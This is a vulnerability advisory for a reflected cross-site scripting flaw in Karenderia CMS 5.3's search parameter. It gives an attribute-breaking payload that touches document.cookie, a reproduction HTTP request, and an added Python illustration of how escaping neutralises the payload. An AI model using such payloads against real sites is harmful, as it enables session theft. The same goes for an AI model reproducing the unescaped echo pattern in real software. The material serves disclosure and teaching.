# Exploit Title: Karenderia CMS 5.3 - Reflected Cross site scripting
# Dork: N/A
# Date: 09-07-2019
# Exploit Author: Sisyshell
# Vendor Homepage: buyer2@codemywebapps.com
# Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
# Version: v5.3
# Category: Webapps
# Tested on: Windows
# CVE: N/A

Description
---------------
Reflected XSS via 's' param at /searcharea?s=" onmouseover="console.log(document.cookie);"

Payload: " onmouseover="console.log(document.cookie);"
Browser: Firefox 67
Date Observed: 9 July 2019

Reproduction GET
----------------
GET http://bastisapp.com/kmrs/searcharea?s="+onmouseout="alert(1);" HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Connection: keep-alive
Cookie: PHPSESSID=94kt2rgji1ir1fd1lnlha4m0q0; YII_CSRF_TOKEN=a2a652784b4e1f917ad08aba59a875be88c97873; kr_search_address=%22+onmouseout%3D%22alert%281%29%3B%22; client_location=%7B%22lat%22%3A0%2C%22long%22%3A0%7D
DNT: 1
Host: [domain].com
Pragma: no-cache
Referer: http://[domain].com/kmrs/
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0

Reproduction Response
---------------------
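
Added example (not part of the original advisory and not Karenderia's code): it shows why the reported 's' value becomes an event-handler attribute when echoed verbatim into a double-quoted HTML attribute, and how output encoding keeps it inside the value. The template and all function names are assumptions made for illustration; the advisory does not show the page markup.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# ASSUMPTION: the advisory does not show the page markup; this constructed
# template stands in for any view that echoes 's' into a quoted attribute.
TEMPLATE = '<input type="text" name="s" value="{}">'

# Payload exactly as given in the advisory's Description section.
PAYLOAD = '" onmouseover="console.log(document.cookie);"'

def decode_query_value(raw):
    """Decode a raw query-string value the way the server does ('+' -> space)."""
    return unquote_plus(raw)

def render_vulnerable(s):
    """Echo the parameter verbatim: the reflected behaviour being reported."""
    return TEMPLATE.format(s)

def render_escaped(s):
    """Encode & < > " ' so the value cannot terminate the attribute."""
    return TEMPLATE.format(html.escape(s, quote=True))

class _InputAttrs(HTMLParser):
    """Collects the attributes of the first <input> start tag it sees."""
    def __init__(self):
        super().__init__()
        self.attrs = None
    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)

def input_attributes(markup):
    """Tokenize the markup and return the <input> element's attributes."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}

def event_handlers(markup):
    """Names of on* attributes that ended up on the element."""
    return sorted(k for k in input_attributes(markup) if k.startswith("on"))

if __name__ == "__main__":
    for value in (PAYLOAD, decode_query_value('"+onmouseout="alert(1);"')):
        for render in (render_vulnerable, render_escaped):
            print(render.__name__, event_handlers(render(value)))
```

In the escaped rendering the parser recovers the full payload as the text of the value attribute, so the search box can still display what the user typed without it being interpreted as markup.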